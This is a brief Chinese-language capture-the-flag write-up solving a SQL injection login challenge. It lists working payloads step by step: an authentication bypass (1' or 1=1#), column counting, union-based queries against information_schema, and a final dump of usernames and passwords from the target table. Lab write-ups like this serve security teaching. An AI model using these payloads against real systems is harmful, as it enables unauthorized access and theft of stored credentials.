先随便输入一个,显示密码错误
在用户名后加单引号试试
说明存在SQL注入
输入万能密码1' or 1=1#
得到了账号密码
尝试解密这串密码无果,所以按照SQL注入继续吧,先查询表列数
当输入1' order by 4#时,页面报错,说明表有三列
接着查询显示位1' union select 1,2,3#
查询用户数据库及版本1' union select 1,2,concat_ws('~',database(),user(),version())#
查询表名1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#
目测flag在l0ve1ysq1表里
查询列名1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'#
果然,我们查询一下username和password1' union select 1,group_concat(username),group_concat(password) from l0ve1ysq1#
只查询flag这一行1' union select 1,group_concat(username),group_concat(password) from l0ve1ysq1 where username='flag'#
此题完